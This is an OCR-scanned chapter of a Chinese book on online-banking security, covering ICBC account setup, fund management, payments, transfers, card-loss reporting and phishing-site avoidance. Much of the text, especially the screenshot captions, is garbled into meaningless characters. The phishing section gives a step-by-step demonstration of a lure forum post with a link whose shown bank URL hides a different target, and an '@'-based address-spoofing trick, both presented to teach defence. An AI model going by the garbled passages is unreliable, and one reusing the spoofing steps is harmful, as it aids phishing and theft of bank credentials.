我 各 道 我 不 能 撤销 或 停止 此 操 
作 。 
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第 14 昔 ”网 上 银行 的 安全 防护 策略 


随 着 网 络 的 发 展 ， 现 在 很 多 人 开始 使 用 网 上 银行 进行 商品 交易 、 资 金 的 管理 ， 如 网 上 
支付 、 转 账 汇款 、 定 期 存款 及 网 上 贷款 等 ， 本 章 就 来 介绍 网 上 银行 的 安全 防护 策略 。 


14.1 开通 个 人 网 上 银行 


网 上 银行 能 够 给 人 们 的 生活 带 来 “3A 
服务 ”《 任 何 时 间 、 任 何 地 点 、 任 何方 
式 ) 的 便利 ， 不 过 要 想得到 这 种 3A 服 务 ， 
首先 必须 开通 网 上 银行 。 这 里 以 开通 网 上 
工商 银行 为 例 进行 介绍 。 


湿 14.1.1 开通 个 人 网 上 银行 的 步骤 


个 人 网 上 工商 银行 适用 的 对 象 为 : 
凡 在 工行 开 立 本 地 工 银 财富 卡 、 理 财 金 账 
回 户 、 牡 丹 灵通 卡 、 牡 丹 信 用 卡 、 活 期 存折 
等 账户 且 信 誉 良好 的 个 人 客户 ， 均 可 申请 
成 为 个 人 网 上 银行 注册 客户 。 

开通 个 人 网 上 工商 银行 的 步骤 如 下 。 
需要 客户 提供 本 人 有 效 身份 证 件 和 所 
需 注 册 的 工行 本 地 银行 卡 或 存折 。 
[see 贺 客户 填写 资料 。 客 户 需 填写 的 资料 为 
《中 国 工商 银行 电子 银行 个 人 客户 注册 申 
请 表 》， 在 填写 资料 之 前 务必 知悉 申请 表 
背面 的 《中 国 工 商 银行 电子 银行 个 人 客户 
服务 协议 》。 
[step 图 提交 申请 资料 。 客 户 应 向 工行 提交 
的 申请 资料 包括 : 已 在 本 地 开 立 账户 、 
《中 国 工商 银行 电子 银行 个 人 客户 注册 申 
请 表 》、 本 人 有 效 身份 证 件 、 需 注册 的 银 
行 卡 。 
[Sep 加 窑 户 确认 签字 ， 开 通 。 
[step 图 在 电脑 上 安装 安全 控件 和 证 书 驱 动 。 
[step 园 证 书 安装 成 功 后 ， 成 为 个 人 网 上 银 
行 高 级 客户 ， 可 使 用 个 人 网 上 银行 的 所 有 
服务 。 


如 下 图 所 示 即 为 工商 银行 网 上 银行 开 
通 流程 和 开办 条 件 介绍 界面 。 
OO Ee -6| Gemre ems 于 


= 开通 流 性 | 


、 而 天 过 


阐 厅 网 工 行 失 交 的 鲜红 资料 立户， 天 沈 供 信 人 有 效 刁 从 证 件 ， 关 注册 的 帘 行 


14.1.2 ”注册 网 上 个 人 银行 


网 上 银行 注册 与 登录 的 具体 操作 步骤 
如 下 。 
[sep 团 打开 IE 浏览 器 ， 在 地 址 栏 中 输入 工 
商 银 行 的 网 址 http://www.icbc.com.cn/， 按 
Enter 键 ， 即 可 打开 工商 银行 首页 。 


step 图 在 其 中 单 击 “ 个 人 网 上 银行 ”下 侧 
的 “注册 ”按钮 ， 打 开 “ 网 上 自助 注册 须 
知 ” 界 面 ， 在 其 中 认真 阅读 其 相关 说 明 。 
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ICBC ( 国 中 国 工商 银行 ww 


esr 2 
网 上 自动 注册 须知 
呈 个 人 网 上 很 和 
Rt 于 机 PF INN 二、 
pi Tecea 


要 人 LE， im LN 
ER 

1 

Fan Fe 

:Mm LACE 天 本人 中 开 下 

Bieterh Fe Oe i ,Bt 

pe 


3 A 


step 图 单 击 “ 注 册 个 人 网 上 银行 ”按钮 ， 打 
开 “ 开 户 信息 提示 ”界面 ， 在 其 中 输入 用 
户 Wetter 账户 或 注册 卡 密 


码 及 验证 码 等 ， 单 击 “提交 ”按钮 ， 即 可 
注 届 成 翅 。 
上 开户 信息 探 不 
同上 理 埠 信用卡、 牡丹 信 阳 卡 、 菇 记 卡 、 两 着 卡 ， 灵 盐 卡 、 无 折 灵 通 卡 
绳 到 时 生计 户 等 卡 类 型 


请 与 折 [联系 weinssterls be con sn 中 国 工 亲人 上 所 有 


[Step 加 在 注册 成 功 后 ， 单 击 工商 银行 首页 中 
的 “个 人 网 上 银行 登录 ”按钮 ， 打 开 “ 个 
人 网 上 银行 登录 ”界面 。 


ER 
办 卡 (及 号 /同名 : | 按 有 Ps 
所: 六: 
WEN: | 区 ST 有 6] 


冤 半 用 同上 急行， he Fh ed es 
人 可 户 议 》 和 《中 国生 个人 直行 交 电 吓 9 人 有 上 人 同上 和 江天 
辣 这 并 村 《中国 工商 相生 二 伯 直 人 同上 要 和 服务 洒 昌 ) 


EL 


[sp 图 在“ 卡 ( 账 ) 号 /用 户 名 ”文本 框 中 
输入 个 人 网 上 银行 的 用 户 名 或 卡号 ， 以 及 
登录 密码 和 验证 码 等 。 


下 太古 下 开行 要 未 
办 卡 三) /站 PS: Pim -二 
i ee 


wen: J EEID 

你 借用 同 上 银行 ， 肌 网 和 并 过 守 《中 医 工交 衬 行 电子 衬 行 生 笠 、《 中 国 工商 久生 电子 和 和 个 
A 六》 和 《中 国 工商 全 个人 所 L 名 NI。 如 村 个 人 由 上 久生 
并 音字 4 中国 工 丙 银行 类 二 个 人 网 上 氏 行 有 务 并 各 


[Step 图 单 去 “登录 ”按钮 ， 即 可 登录 到 个 人 
网 上 银行 账户 界面 。 


NE 


a 
WE 


Ca 


Sueneta np 


斧 提 示 : 在 注册 网 上 银行 账户 后 ， 用 户 
就 可 以 用 注册 的 账户 和 密码 登录 网 上 银行 
系统 ， 但 是 ， 在 进入 网 上 银行 系统 之 前 ， 
还 需要 进行 一 些 必要 的 安全 设置 ， 如 下 载 
网 上 银行 安全 控件 、 进 行 必 要 的 登录 验证 
等 ， 以 确保 其 安全 性 。 


14.1.3 ”自助 登录 网 上 银行 


自助 登录 的 操作 非常 简单 ， 用 户 只 需 间 
下 载 和 安装 网 上 银行 安全 控件 后 ， 就 可 以 
进入 个 人 网 上 银行 用 户 登 录 面 。 

进行 自助 登录 的 操作 步骤 如 下 。 
[step 加 注册 网 上 银行 成 功 后 ， 再 次 登录 工商 
银行 的 网 上 银行 ， 在 其 主页 中 单 击 “ 个 人 
网 上 银行 登录 ”按钮 ， 进 入 中 国 工商 银行 
个 人 网 上 银行 登录 界面 。 


登录 
是 下 ( 昧 ) 二 /手机 /用 记名 
a 


忘记 安 码 
bd 


“工行 要 助手 "” 助 您 刍 雪 六 更 新 网 
银 安 全 控件 及 工具 , 建议 安 闫 . 


[step 图 在 该 界面 中 单 去“ 安装 ”链接 ， 打 开 
“安全 警告 ”对 话 框 ， 提 示 用 户 是 否 安装 
此 软件 。 


interet Explorer - 安全 各 x 


你 于 安 入 软件 亲 ? 


这 :二 工商 各 行 安全 拉 牛 ( 达 反 安 闫 ) 
发布 者 Industrial and Commercial Bank of China Limited 


Ca 


@ 玉 丘 Internet 的 文件 可 对 对 他 有 扩 关 用， 但 此 文件 类 型 可 能 危 填 你 的 计算 机 。 靖 仅 
实物 床 全 他 信任 的 发 布 者 的 次 慎 ， 二 有 12 


六 更 多 这 项 [D) RD) 
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step 国 单 去 “安装 ”按钮 ， 即 可 开始 下 载 并 
安装 银行 安全 控件 。 人 安装 完毕 后 ， 自 动 返 
回 到 个 人 网 上 银行 登录 界面 。 


step 园 在 个 人 网 上 银行 登录 区 域 中 输入 卡 
号 或 用 户 名 及 登录 密码 和 验证 码 等 ， 最 后 
单 击 “ 登 录 ” 按 钮 ， 就 可 以 进入 网 上 银 
行 了 。 


外 轨 刘 可 作 的 时 本 人 交际 户 


Ee 


EE PEDG Hip mom mem a 


om 。。 臣 百 让 有 


TE FoI FOS 


tm NP 


14.2 ”账户 信息 与 资金 管理 


在 登录 到 个 人 网 上 银行 后 ， 下 面 就 可 
以 对 账户 信息 与 资金 进行 管理 了 。 本 节 就 
来 介绍 如 何在 网 上 管理 自己 的 账户 信息 与 
资金 。 
加 14.2.1 ”账户 信息 管理 


管理 账户 信息 的 具体 操作 步骤 如 下 。 


stsp 轩 参照 网 上 银行 登录 的 方法 ， 登 录 到 个 


人 网 上 银行 。 在 界面 的 左 侧 单 击 “ 账 户 信 
息 ” 前面 的 “+”， 展 开 账户 信息 列表 。 


的 时 外 本人 他 阳 户 
EZ 


本 下 者 位 目 后 县 
NE 全 Pj 类 型 Ei 
北京 下 局 天 全 户 卡 约 一 ~ = 本 也 而 E> 


[step 图 在 “账户 管理 ”列表 中 单 击 “ 账 户 别 
名 维护 ”选项 ， 进 入 “账户 别名 维护 ” 界 
面 ， 在 “未 设置 ”文本 框 中 输入 要 设置 的 
别名 ， 并 在 “交易 提示 ” 框 中 查看 相关 提 


示 信 息 。 
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册 卡 及 账户 ”选项 ， 进 入 “添加 注册 卡 及 
账户 ”界面 ， 在 其 中 根据 提示 输入 相应 的 
内 容 ， 然 后 单 击 “ 增 加 ”按钮 即 可 。 


BE 


Ee 


[step 园 在 “账户 管理 ”列表 中 单 击 “ 下 挂 卡 

(账户 ) 转注 册 卡 (账户 ) ”选项 ， 进 入 
“下 挂 卡 (账户 ) 转注 册 卡 (账户 ) ” 界 
面 ， 在 其 中 根据 提示 选择 要 转 为 注册 卡 的 
下 挂 牡丹 卡 账户 ， 然 后 单 击 “ 确 定 ”按钮 
即 可 。 


TINE HE THIN 
state 


[Eee 图 在 “账户 管理 ”列表 中 单 击 “ 删 除 注 
册 卡 及 账户 ”选项 ， 进 入 “删除 注册 卡 及 
账户 ”界面 ， 在 其 中 根据 实际 情况 选择 要 
删除 的 注册 卡 及 账户 ， 然 后 单 击 “ 删 除 ” 
按钮 即 可 。 


EECTT 
Cr mtn acae 
Ha 本 
[Cr 一 ri 
= | 
E a 一 一 四 
Zens 
玲 上 
me 天 二 
CT 中 EC 
ee 
mitten ian, wi a9 Wh i A 
LR Tc 


step 罗 在 “账户 管理 ”列表 中 单 南 “财富 卡 
管理 ”选项 ， 进 入 “财富 卡 管理 ”界面 ， 


在 其 中 根据 实际 情况 选择 注册 卡 ， 然 后 单 
击 “ 确 定 ”按钮 。 
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击 “ 确 定 ” 0 


-EE 


a 
人 


cea 


Tp 5 i 


[Step 图 在 “账户 管理 ”列表 中 选择 “工行 


step 国 进入 “财富 卡 管理 ”设置 界面 ， 在 其 
中 根据 实际 情况 选中 相应 的 单 选 按钮 。 


TW RE VRE 


[一 aeraen 
ec i 工人 二 上 三 让 
Ta 
i | agesnaRh ee A 三- 

一 | epee 
-mpomy | Pe Ce 
ET 
地 
| 这 


二 四 设置 完 毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 即 
可 将 选择 的 注册 卡号 开通 境外 交易 。 


dd “rm Ne 
-oh 
ernse 

PE ee 

和 | RE a 
HP 

二 户 央 Ed 

by 吓 [ee 

Mh 中 

4 
Di 时 
rhottA rE | 局 


Me "| 
ITPA AINE 
Gy "| 

.IMAIHA 国 
by 


LEW 
bd 时 


EG 国 在 “账户 管理 ”列表 中 选择 “银行 
户口 服务 ”选项 ， 进 入 “银行 户口 服务 ” 
界面 ， 在 其 中 根据 实际 情况 输入 支付 密 
码 、 验 证 码 等 信息 ， 单 击 “确认 ”按钮 
即 可 。 


ee 


[step 加 在 “账户 管理 ”列表 中 选择 “工行 
账户 挂 入 工 银 亚洲 网 银 申 请 ”选项 ， 进 入 
“工行 账户 挂 入 工 银 亚洲 网 银 申 请 ” 界 
面 ， 在 其 中 根据 提示 输入 相应 的 内 容 ， 单 


账户 挂 入 工 银 亚洲 网 银 取消 ”选项 ， 进 入 
“工行 账户 挂 入 工 银 亚洲 网 银 取 消 ” 界 
面 ， 在 其 中 根据 提示 输入 相应 的 卡号 。 


NT 


ee El 
ret ni 


a mm ee Wott TH 
Re TNE fh 
Ee 


[step 图 单 击 “确定 ”按钮 ， 在 打开 的 页 面 中 
Fe ey 


raam 


Eee IEPSGE MPa 
3 mm x 


HE 
| Ema Ean 


BE 图 单 去 “确定 ， 按钮 ， 在 打开 的 界面 中 
提示 用 户 “ 工 行 账户 挂 入 工 银 亚洲 网 银 取 
消 成 功 ”。 


eri 


We 和 TRNA TNR 


[Sep 贺 在 “账户 管理 ”列表 中 选择 “ 工 银 
亚洲 账户 挂 入 工行 网 银 申 请 ”选项 ， 进 入 
“ 工 银 亚 洲 账户 挂 入 工行 网 银 申 请 ” 界 
面 ， 在 其 中 根据 提示 输入 相应 的 卡号 、 户 
名 及 证 件 号 等 。 
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Step 图 设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 即 
可 提交 申请 。 


移 提 示 : 个 人 网 上 银行 用 户 还 可 以 参照 
账户 管理 的 方法 ， 来 对 自己 的 账 务 进行 查 
询 ， 如 查看 电子 回 单 、 电 子 工资 单 、 住 房 
公积金 、 网 上 纳税 及 跨行 账户 管理 。 


5 14.2.2 ”网 上 支付 缴费 


网 上 支付 已 经 不 再 是 一 个 新 的 话题 ， 
随 着 网 络 技术 的 发 展 和 普及 ， 以 及 网 购 的 
口 盛行 ， 网 上 支付 交易 越 来 越 多 。 这 里 就 以 
如 网 上 缴费 为 例 ， 讲 解 网 上 支付 的 方法 ， 具 
到 体 的 操作 步骤 如 下 。 

[Sep 加 登录 到 个 人 网 上 银行 账户 中 ， 在 界 
面 中 单 击 “ 缴 费 站 ”按钮 ， 进 入 “缴费 产 
品 ” 界 面 ， 在 其 中 可 以 看 到 自己 需要 支付 
的 清单 。 


Fem TE TE 

[Ec | 
Dd “E/E 下 drseenss 
| i ba 
Names 二 人 | 1 
me 
ran 
sheen 


step 图 单 去 “缴费 ”链接 ， 进 入 1702 直 接 缴 
费 界 面 ， 在 “金额 ”文本 框 中 输入 缴费 的 
金额 。 


TOED 


卡 (帐号 mm 上 1 
EI] 元 


HT0s 抽 区 并 模式 党 济 交 虹 


em 


step 图 单 击 “提交 ”按钮 ， 在 打开 的 界面 中 
输入 卡号 的 支付 密码 及 验证 码 。 
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7 了 各 要 汉 》 在外 玫 击 ”在 生 要 二 


EEC 


卡 (三) 吕 CH 
全 : 4 元 
KHER: Fe 
ER TT ELI 
六 座 提请 才 击 和 


Step 加 单 击 “提交 ”按钮 ， 即 可 缴费 成 功 ， 


并 显示 交易 结果 ， 显 示 为 ok。 


区 
[EEC 下 EIE 目 
卡 旺 ) 号 CE 
0 1o0 元 
Bn 
Ecc 


14.2.3 ”网 上 转账 汇款 


转账 汇款 是 网 上 银行 的 主要 业务 ， 尤 
其 是 对 企业 及 网 上 开店 的 店主 来 说 更 是 如 
此 。 以 在 个 人 网 上 银行 转账 汇款 为 例 ， 具 
体 的 操作 步骤 如 下 。 

EEG 国 打开 个 人 网 上 银行 主页 ， 在 其 中 单 
击 “ 转 账 汇款 ”按钮 ， 进 入 “转账 汇款 ” 
界面 。 

FT 


同上 :导入 。 同上 才 民 由 江 站 失 直 人 外 CE 同和 
全 如 下 。 同上 同 牙 。 工行 供电 于 模 生肖。 他 行 上 对 和 


[ET 
EN 上 
2 中心。 窜 P 图 条 。 分 生 特色。 公司 请 芝 


[EE 

Re i 人 fF 
本 

Pi ee -i 

站 - 地 

LS - EE 

smce E Ea EE 

sR = I 

nce =- 到 

7 shears EB 1 EE 

i suka, 
pens DE Ea M78, elysrees 六 至 


step 园 在 其 中 单 击 “ 转 账 ” 链 接 ， 进 入 
“工行 转账 汇款 ”界面 ， 在 其 中 输入 收 款 
人 姓名 、 账 号 ， 然 后 根据 提示 填写 汇款 


信息 。 


工行 转生 工 革 
特别 提示 : 公益 捐款 ， 请 点 击 这 里 。 
第 一 步 : 请 让 写 收 堵 人 信息 或 选择 我 的 路 烤 人 
收 茂 人 : | 衣 运 茎 歌手 工艺 入 
账 号 : 


第 二 步 : 请 靖 写 江 莪 信息 
而 种 人民 而 
汇 教 全 项: 元 起 : 
用 途 : 还 莫 
时 言 TN 

第 三 步 : 请 斌 与 付 蒜 信息 

人 党 卡 味 ] 号 ， 北 训 加 是 是 天天 iH 圭 休 广 卡 许 时 主 
全 四 户 ，00000 于 关 章 坟 户 


三 : 从 二 


开车 成 功 后 ， 和 请 给 入 于 机 号 码 : 
各 从政 直人 名 团 中 


step 图 输入 完毕 后 ， 单 击 “ 工 行 转账 汇款 ” 
界面 中 的 “提交 ”按钮 ， 即 可 转账 成 功 。 


第 二 步 : 请 时 与 汇 蒜 信 息 
而 种 ， 人民 而 “~ 


二: | 兵 娄 
用 途 ， 还 著 
时 言 : Th 


第 三 步 ; 请 寺 写 付 训 信息 
你 卡 中) 号。 北京 让 时 三 = 
00000 活期 寻 坟 广 IO :和 记 


汇款 成 功 后 , 生生 入 本 人 于 请 答 入 于 机 号 至: 
或 从 收 款 人 名 有 中 二 
注 : 短途 知 0 


Er EE 


14.3 ”网 银 安全 的 防护 策略 


网 上 银行 为 用 户 提供 了 安全 、 方 便 、 
快捷 的 网 上 理财 服务 ， 不 仅 使 用 户 能 够 进 
行 账户 查询 、 支 付 结算 等 传统 银行 柜台 服 
务 ， 而 且 还 可 以 实现 现金 管理 、 投 资 理财 
等 功能 。 但 是 ， 为 了 保证 网 上 银行 的 安 
全 ， 一 些 安全 措施 是 必 不 可 少 的 。 


14.3.1 网 上 挂失 银行 卡 


当 突 然 发 现 自己 的 银行 卡 丢 失 了 ， 则 
必须 马上 进行 挂失 。 用 户 可 以 到 实体 银行 
进行 申请 挂失 ， 也 可 以 在 网 上 申请 挂失 。 
在 网 上 申请 挂失 的 操作 步 又 如 下 。 

[step 国 登录 到 自己 的 个 人 网 上 银行 账户 ， 在 
打开 的 界面 中 单 击 “ 网 上 挂失 ”按钮 ， 进 
入 “操作 指南 ”界面 。 
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有 


委 在 沽 南 
人 可 2 信和 9 上 训 生 用 下， 下 必 各 户 天 生 持 夫 ， 全 奋 代 护 人 的 光 多 安全 


+ 
避 身 理 卫 上 根 行 注册 卡 柱 失 北 务 。 


1 8 向 
事 向 理 到 上 银行 注册 卡 的 下 挂 于 户 挂失 北 务 。 


step 图 在 “操作 指南 ”界面 中 单 击 “挂失 ” 


链接 ， 进 入 “挂失 ”界面 。 


> > 同上 后 大 > 其 拓 
Em asata 
过 页 开户 地 区 卡 【 联 户 ) 类 型 卡 (由 ;号 幅 户 别名 
所 京 5 代 不 955EEC0CDDD1S447859 
相 人 非 竹山 陈 户 流失 ; 
卡 (对 ) 号 ; 王 补 类 型 贞 价 下 证件 呈 玛 ; 
EE 
[step 图 在 其 中 输入 要 挂失 的 银行 卡号 ， 并 选 
择 证 件 类 型 及 输入 证 件 号 码 。 
》》 同上 失 关 > 技术 
[2 
主 并 全 产 技 夫 ; 
选 古 PilE 卡 { 驰 户 ) 由 型 卡 (中) 号 帐户 引种 
斥 3 代 下 ‘553320200015447850 


加 本 人 非 注册 候 户 挂失 ; 
下 ( 放 ) :SE 


单 击 “挂失 ”按钮 即 可 。 


14.3.2 ”避免 进入 钓鱼 网 站 


随 着 使 用 网 上 银行 的 用 户 越 来 越 多 ， 
钓鱼 网 站 也 进入 了 一 个 “飞速 ”发 展 的 阶 
段 ， 用 户 一 不 小 心 就 会 进入 黑客 设计 好 的 
钓鱼 网 站 ， 最 后 造成 不 可 估量 的 损失 。 那 
么 如 何 才能 避免 进入 钓鱼 网 站 呢 ? 这 就 需 


要 用 户 了 解 钓 鱼网 站 的 欺骗 技术 和 防范 钓 馈 


鱼网 站 的 方法 。 
1. 网 络 钓鱼 网 站 的 欺骗 技术 


网 络 钓鱼 的 技术 手段 有 多 种 ， 如 邮 
件 攻击 、 跨 站 脚本 、 网 站 克隆 、 会 话 截取 
等 ， 但 在 各 种 网 银 事 件 中 ， 最 常见 的 是 克 
隆 网 站 和 URL 地 址 欺骗 这 两 种 手段 ， 下 面 
分 别 进行 分 析 。 
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(1) 克隆 网 站 

“克隆 网 站 ”， 也 称 “ 伪 造 网 站 ”， 
其 攻击 形式 被 称 作 域名 欺骗 攻击 ， 即 网 站 
的 内 容 和 真实 的 银行 网 站 非常 相似 ， 而 且 
非常 简单 ， 最 致命 的 一 点 是 通过 网 站 克隆 
技术 克隆 的 网 站 和 真实 的 网 站 真 假 很 难关 
别 ， 有 时 只 是 在 网 站 域名 中 有 一 些 极 细小 
的 差别 ， 不 细心 的 用 户 就 很 容易 上 当 。 

进行 网 站 克隆 首先 需要 对 网 站 的 域名 
地 址 进行 伪装 欺骗 ， 最 常用 的 就 是 采用 和 
真实 银行 的 网 址 非常 相似 的 域名 地 址 ， 如 
虚假 的 农业 银行 域名 地 址 为 www.95569.cn 
和 真实 的 网 址 www.95599.cn 只 有 一 个 “6” 
字 之 差 ， 不 细心 的 用 户 很 难 发 现 。 如 下 图 
所 示 即 为 真实 农业 银行 与 虚拟 农业 银行 的 
对 比 图 。 


图 htpV/wwmw.95599.cm/cmy/defaulthtm 
。 文件 (F) 编辑 (E) 查看 (V) 收藏 天 (A) 工具 (T) 帮助 (H) 
欢迎 访问 中 国家 


CE @ http:// ww.95569.cn/ cn/default htm 
。 文件 (编辑 (E) 可 看 (V) 收藏 夫 (A) 工具 (帮助 (H) 
另外 ， 在 其 他 银行 中 类 似 的 情况 也 出 
现 不 少 ， 如 在 2004 年 出 现 的 中 国 工商 银行 
假冒 的 网 站 使 很 多 用 户 上 当 受 骗 ， 其 假冒 
的 网 站 域名 为 www.1lcbc.com.cn， 这 与 真实 
的 网 址 www.icbc.com.cn 只 有 数字 “1” 和 字 
母 “i” 的 不 同 ， 还 有 一 些 假 冒 的 工商 银行 
的 网 站 地 址 www.icbc.com 只 比 真实 的 网 址 
缺少 “cn” 两 个 字母 ， 不 细心 的 用 户 根 本 
不 容易 发 现 。 


€, http://wwwlcbc.com.cn/icbc/ 
文件 (F) ”编辑 (E) ”前 看 (V) ”收藏 夫 (A) 工具 (T) ”帮助 (H) 


€) https//wwwicbc.com.cn/icbe/ 
文件 (编辑 (E) ”查看 (V) ”收藏 夫 (A) 工具 (T) ”帮助 (H) 


总 之 ， 网 站 克隆 攻击 很 难 被 用 户 发 
现 ， 一 不 小 心 就 很 容易 上 当 受 骗 。 除 此 之 
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外 ， 现 在 网 站 的 域名 管理 也 不 是 很 严格 ， 
普通 用 户 也 可 以 申请 注册 域名 ， 使 得 网 站 
域名 欺骗 展 屡 发 生 ， 给 网 银 用 户 带 来 了 极 
大 的 经 济 损失 。 但 是 ， 假 的 真 不 了 ， 真 的 
假 不 了 ， 伪 造 的 网 站 界面 无 论 是 网 站 的 
Logo、 图 标 、 新 闻 还 是 超级 链接 等 内 容 即 
使 都 能 连接 到 真实 的 网 页 ， 但 在 输入 账号 
的 位 置 处 就 会 存在 着 与 真实 网 站 的 不 同 之 
处 ， 这 是 网 站 克隆 攻击 是 否 成 功 的 关键 所 
在 。 当 用 户 输入 自己 的 账号 和 密码 时 ， 网 
站 会 自动 弹出 一 些 不 正常 的 窗口 ， 如 提示 
用 户 输入 的 账号 或 密码 不 正确 ， 要 求 再 次 
输入 账号 和 密码 的 信息 窗口 等 。 其 实 ， 在 
用 户 第 一 次 输入 账号 和 密码 并 提示 输入 错 
误 时 ， 该 账号 信息 已 经 被 网 站 后 门 程序 记 
录 下 来 并 发 送 给 黑客 手中 了 。 


ICBC 国 中 国 工商 银行 会 融 @ 家 - 


F/RP SREITEN, A 


i i 


RiPS ,MAD ~ 
SE beter com en LAA 


(2) URL 地 址 欺骗 攻击 

URL 全 称 为 Uniform Resource Loca- 
tors， 即 统一 资源 定位 符 的 意思 ， 在 地 址 
栏 中 输入 的 网 址 就 属于 URL 的 一 种 表现 方 
式 。 基 本 上 所 有 访问 网 站 的 用 户 都 会 用 到 
URL， 其 作用 非常 强大 ， 但 也 可 以 利用 
URL 地 址 进行 欺骗 攻击 ， 即 攻击 者 利用 一 
定 的 攻击 技术 ， 构 造 虚假 的 URL 地 址 ， 当 
用 户 访问 该 地 址 的 网 页 时 ， 以 为 自己 访问 
的 是 真实 的 网 站 ， 从 而 把 自己 的 财务 信息 
泄露 出 去 ， 造 成 严重 的 经 济 损失 。 

在 使 用 该 方法 进行 诱骗 时 ， 黑 客 们 常 
常 是 通过 垃圾 邮件 或 在 各 种 论坛 网 页 中 发 
布 伪造 的 链接 地 址 ， 进 而 使 用 户 访问 虚假 
的 网 站 。 伪 造 虚假 的 URL 地 址 的 方法 有 多 
种 ， 如 起 个 具有 诱惑 性 的 网 站 名 称 、 调 包 


易 混 的 字母 和 数字 等 ， 但 最 常用 的 还 是 利 
用 IE 编码 或 IE 漏洞 进行 伪造 URL 地 址 ， 该 
方法 使 得 用 户 单 击 的 链接 与 真实 的 网 址 不 
符 ， 从 而 登录 到 黑客 伪造 的 网 站 中 。 

这 里 举 一 个 具体 的 实例 来 说 明 利 用 
URL 伪 造 地 址 进行 网 上 银行 攻击 的 过 程 ， 
具体 的 操作 步骤 如 下 。 

[sp 图 在 任意 网 上 论坛 中 发 布 一 个 极 具 有 诱 
惑 性 的 帖子 ， 其 主题 为 “注册 网 上 银行 即 
可 中 1 万 元 大 奖 ! ”。 


ER ET FO 


i IU 众 丫 隐 必 央 坊 加 小 下 避 避 | 才 是 | 至 去 疆 | 本 二 于 


[Bes 图 帖子 内 容 中 输入 诱惑 性 的 信息 ， 并 贸 
下 网 上 银行 的 链接 地 址 ， 这 个 地 址 的 作用 
是 诱导 用 户 登 录 到 自己 伪造 的 网 站 中 ， 并 
使 用 户 误 认为 自己 登录 的 网 站 地 址 是 正确 
的 ， 因 此 需要 在 帖子 中 加 入 如 下 代码 “点 
击 <a hre 舍 "http://www.baidu.com"> 中 国 农业 
银行 网 上 银行 </a>， 即 可 登录 或 注册 网 上 银 
oe ada i 


jv bai can 下 国 二 开 要 司 上 入 生 5， 有司 要 或 注 而 丙 上 大 
人 


Er 


x RE ANCTR ENE ED 


[step 图 输入 完毕 后 ， 单 击 “ 发 表 ” 按 钮 或 在 
编辑 框 内 按 快捷 键 CtrltEnter 发 表 帖 子 。 在 
帖子 发 表 成 功 后 ， 即 可 在 网 页 中 显示 “中 
国 农业 银行 网 上 银行 ”的 信息 。 
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[step 加 当 用 户 单 击 “中 国 农业 银行 网 上 银 
行 ” 链 接 时 ， 打 开 的 却 是 黑客 伪造 的 网 
站 ， 这 里 是 百度 网 页 。 如 果 把 百度 的 网 址 
换 成 黑客 伪造 的 银行 网 站 ， 那 么 用 户 就 有 
可 能 上 当 受 骗 。 
|¢ EETH Py 


二 0 hl 3 3 up EE 人 ^ 


0 国 Re-. Son ® 


Bai 六 百度 


< 攻 2 


从 提示 :当然 ， 这 种 欺骗 方法 是 一 种 比较 
简单 的 方法 ， 稍 有 一 点 上 网 经 验 的 用 户 只 
需 将 光标 放置 在 该 链接 上 ， 即 可 在 下 方 的 
状态 栏 中 看 到 实际 所 链接 到 的 网 址 ， 从 而 
识破 该 欺骗 形式 。 


为 了 进一步 伪装 URL 地 址 ， 还 需要 

在 真实 的 网 上 银行 URL 地 址 中 加 入 相关 

代码 ， 如 把 上 述 帖子 源 代 码 修改 为 “点 

击 <a href="http://www.baidu.com">http:// 

Www.95599.cn/ </a>， 即 可 登录 或 注册 网 上 

银行 就 有 可 能 中 1 万 元 大 奖 ! ”。 
Er | “ 王 记 二 字 汉 9 


ER 上 机 3 
EE RR tad 200 1 


me | 


Er 


ene? 


EC 


认可 | 
bd 号 天 入 他 天 内 究 | 


i 
| 

[step 图 发 帖 成 功 后 ， 在 网 页 中 将 显示 http:// 
Www.95599.cn 的 链接 地 址 ， 即 使 光标 移 
动 到 链接 地 址 上 ， 在 其 窗口 的 状态 栏 中 看 
起 来 依然 连接 到 http:/www.95599.cn。 但 
是 到 单 击 该 链接 后 才 发 现 打开 的 是 伪装 的 
网 站 。 
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丁子 天 下 


及 各 问 上 本色 可 中 1 万 元 大 过 
有 


1 于 htp_wws 95599 和 ， 即 可 生 录 于 攻关 上 各 可 有 可 用 万 元 大 淆 


总 之 ， 针 对 上 述 情况 ， 用 户 在 上 网 的 
过 程 中 ， 一 定 要 随时 注意 地 址 栏 中 URL 的 变 
化 ， 一 旦 发 现 地 址 栏 中 的 域名 发 生变 化 就 要 
引起 高 度 的 重视 ， 从 而 避免 自己 上 当 受 骗 。 

2. 浏览 器 漏洞 攻击 

利用 浏览 器 的 相关 漏洞 和 语法 错误 
等 ， 可 以 让 用 户 无 法 觉察 到 URL 地 址 的 变 
化 ， 进 而 起 到 欺骗 用 户 的 目的 。 如 在 一 
些 没 有 打 过 补丁 的 计算 机 中 ， 将 URL 地 址 
修改 为 http://www.95599.cn/@www.baidu. 
com/， 当 用 户 单 击 后 在 打开 的 浏览 器 标题 
栏 和 地 址 栏 中 都 会 看 到 其 链接 地 址 为 http:/ 
www.95599.cn， 但 其 实际 上 显示 的 界面 却 
是 百度 网 页 。 


@ EE | cmcs . 
me sm hin sm nn we sa a EEEE] 


Bai 癌 EE 


这 时 如 果 将 百度 网 址 换 成 黑客 伪造 的 
银行 地 址 ， 则 后 果 是 十 分 严重 的 。 另 外 ， 
URL 欺 骗 攻 击 的 手段 还 有 其 他 形式 ， 如 利 
用 IE 最 新 漏洞 或 其 他 一 些 脚本 编程 技术 ， 
使 得 新 打开 的 网 页 不 显示 地 址 栏 或 完全 显 
示 与 真实 网 站 界面 一 样 的 信息 ， 所 以 网 上 
银行 使 用 者 一 定 要 及 时 为 自己 的 系统 打上 
漏洞 补丁 ， 以 避免 黑客 们 利用 这 个 漏洞 来 
窃取 自己 的 银行 账户 等 隐私 信息 。 


14.3.3 ”使 用 网 银 安全 证 书 
网 银 安全 证 书 是 银行 系统 为 网 银 客户 
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提供 的 一 种 高 强度 的 安全 认证 产品 ， 也 是 
网 银 用 户 登 录 网 上 银行 系统 的 唯一 凭证 。 
目前 ， 所 有 国内 银行 网 站 ， 在 第 一 次 进入 
网 银 服务 项 目 时 ， 都 需要 下 载 并 安装 安全 
证 书 ， 所 以 网 银 用 户 可 以 通过 检查 网 银 安 
全 证 书 ， 来 确定 打开 的 银行 网 站 系统 是 
不 是 黑客 伪造 的 。 这 里 以 中 国 工商 银行 为 
例 ， 来 具体 介绍 网 银 安全 证 书 下 载 并 安装 
